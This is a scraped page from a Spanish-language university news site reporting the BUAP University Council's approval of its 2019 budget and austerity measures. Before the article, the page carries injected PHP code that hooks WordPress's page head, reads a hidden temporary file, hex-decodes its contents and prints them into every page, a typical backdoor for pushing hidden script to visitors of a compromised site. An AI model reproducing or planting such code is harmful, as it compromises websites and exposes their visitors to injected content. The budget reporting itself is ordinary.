if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Consejo Universitario BUAP aprueba Presupuesto de Egresos y Proyecto Anual de Ingresos 2019 – La Opinión Universitaria La Opinión Universitaria
Menu

Consejo Universitario BUAP aprueba Presupuesto de Egresos y Proyecto Anual de Ingresos 2019

 

  • Fueron presentadas medidas de austeridad que comenzarán a aplicarse a partir de este día

Por Diego Cuautle

El Consejo Universitario de la Benemérita Universidad Autónoma de Puebla (BUAP) aprobó por unanimidad el Proyecto Anual de Ingresos y Presupuesto de Egresos 2019 que tendrá un monto de 6 mil 872 millones 384 mil 172 pesos.

En Sesión Ordinaria llevada a cabo en el Edificio Carolino, se dio a conocer que dicha cifra es correspondiente a subsidio ordinario, federal y estatal, así como a ingresos que generará la institución poblana.

Al respecto, el Tesorero General, Oscar Gilbón Rosete explicó que del subsidio ordinario federal se tendrá una partida de 4 mil 227 millones 425 mil 593 pesos, mientras que del subsidio ordinario estatal será de 2 millones 057 mil 537 pesos y del subsidio extraordinario estatal de 300 millones de pesos e ingresos escolares de 287 millones 420 mil pesos.

En este sentido, comentó que del total la universidad sólo en nómina eroga 5 mil 540 millones 326 mil 855 pesos, durante el año y comentó que en gasto operativo representa el 20 por ciento del presupuesto, por ello se busca un ahorro de 100 millones de pesos.

Asimismo, señaló que las necesidades en infraestructura incrementan cada día, por lo que indicó que el existe una bolsa de obras por más de 800 millones de pesos, sin embargo se cuenta con 75 millones de este ejercicio que se suman los 200 millones de pesos del 2018.

Explicó que el subsidio federal va acompañado de la parte estatal, por ello se tuvo en enero el problema de la distribución de recursos, así como en meses del año pasado.

En este sentido dijo que el ambiente se nota más débil en cuestión del apoyo a las universidades, pues se está en espera de la llegada de los recursos que permitan hacer actividades y que liberen recursos que generalmente se tienen destinados para pago de nómina.

Las medidas de austeridad que se implementarán

Durante su discurso, Gilbón Rosete dio a conocer las medidas de austeridad que comenzarán ejecutarse a partir de este este día de las cuales, con ellas se pretende tener un ahorro de 100 millones de pesos anuales y los cuales serán destinados a los diferentes proyectos que ya se tiene contemplados.

Entre las que fueron presentadas destacan para la optimización, un ajuste del 10 por ciento menos al actual monto de la nómina en las áreas administrativas y a su vez el ya no poder hacer contratación alguna.

Además no se asignará partida presupuestal para la adquisición de vehículos nuevos e incluso se revisarán los vehículos para reducir el parque de control vehicular con la intención de ahorrar los 100 millones de pesos establecidos por la institución.

Se revisarán consumos de telefonía fija y móvil, pues se analiza eliminar definitivamente el apoyo para pago de telefonía móvil a todo el personal que goce de este beneficio por lo que ellos mismos tendrán que realizar el pago de su servicio si así lo requieren.

También destaca se la reducción de los apoyos para eventos académicos y se efectuará una reducción en gasto de operación del 10 por ciento reflejado en el fondo fijo como la eliminación de gastos en consumo de restaurantes, a menos que cumplan con las observaciones que la rectoría señaló.

 

 

  • No comments

    Deja una respuesta

    Tweets recientes